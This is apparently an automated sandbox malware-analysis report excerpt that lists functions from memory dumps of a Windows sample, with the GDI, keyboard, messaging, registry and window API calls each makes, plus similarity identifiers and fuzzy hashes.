                                                                                                                Function 00447303 Relevance: 10.7, APIs: 7, Instructions: 192COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                • String ID:
                                                                                                                • API String ID: 4082120231-0
                                                                                                                • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                                                                • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                                                                Function 0044733D Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                                                                • String ID:
                                                                                                                • API String ID: 288456094-0
                                                                                                                • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                                                                • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                                                                Function 0042540D Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCPInfo.KERNEL32(00000000,?,00000000,00000001,00000000,?,?,?,0041D4AE,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00425458
                                                                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,?,?,0041D4AE,00000000,00000000,?), ref: 00425471
                                                                                                                • MultiByteToWideChar.KERNEL32(00000100,00000001,0041D4AE,00000000,00000000,00000000,?,?,?,0041D4AE,00000000,00000000,?,?,00000000,00000000), ref: 004254CF
                                                                                                                • MultiByteToWideChar.KERNEL32(00000100,00000001,0041D4AE,00000000,?,00000000,?,?,?,?,?,?,0041D4AE,00000000,00000000,?), ref: 0042551E
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,0041D4AE,00000000), ref: 00425539
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0041D4AE,00000000), ref: 0042555F
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0041D4AE,00000000), ref: 00425584
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 1775632426-0
                                                                                                                • Opcode ID: 691f6279820d20f455e7befef3e0fcba74c582925611e7755a6e8405b10c4f55
                                                                                                                • Instruction ID: cfbbdbeff2fc93c5700b589297128cc5131deecd4fa0efd2065aadc2599a9f50
                                                                                                                • Opcode Fuzzy Hash: 691f6279820d20f455e7befef3e0fcba74c582925611e7755a6e8405b10c4f55
                                                                                                                • Instruction Fuzzy Hash: F351A231E00628AFCF219F95EC44DEFBBB5EF88311F60011AF914A2250D3398D81CB68
                                                                                                                Function 0046BB59 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 168networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastselect
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 215497628-2761332787
                                                                                                                • Opcode ID: 8403caabb69194ab749b3558b6d17cf16ba223cf5fbe2e3d1d341ca8c1bfc534
                                                                                                                • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                                                • Opcode Fuzzy Hash: 8403caabb69194ab749b3558b6d17cf16ba223cf5fbe2e3d1d341ca8c1bfc534
                                                                                                                • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                                                Function 0044496C Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 004449B0
                                                                                                                • GetKeyboardState.USER32(?), ref: 004449C3
                                                                                                                • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                                                                • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                                                                Function 00444B65 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00444BA9
                                                                                                                • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                                                                • SetKeyboardState.USER32(?), ref: 00444C08
                                                                                                                • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                                                                • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                                                                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                                                                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                                                                • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                                                                Function 004498BD Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                                                                • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                                                                Function 0046A98D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConnectRegistry
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 76216097-2761332787
                                                                                                                • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                                                                • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                                                                Function 00455297 Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                                • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2354583917-0
                                                                                                                • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                                                • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                                                Function 00448877 Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 896007046-0
                                                                                                                • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                                                                • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                                                                Function 004413F0 Relevance: 10.6, APIs: 7, Instructions: 114windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                • SendMessageW.USER32(019F1B28,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                • SendMessageW.USER32(019F1B28,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 312131281-0
                                                                                                                • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                                                • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                                                Function 0047244D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                                                • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                                                • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                                                • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                • String ID: 0vH
                                                                                                                • API String ID: 327565842-3662162768
                                                                                                                • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                                                • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                                                Function 00448AFF Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                                                                • GetFocus.USER32 ref: 00448B1C
                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3429747543-0
                                                                                                                • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                                                • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                                                Function 00450DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: Msctls_Progress32
                                                                                                                • API String ID: 3850602802-3636473452
                                                                                                                • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                                                                • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
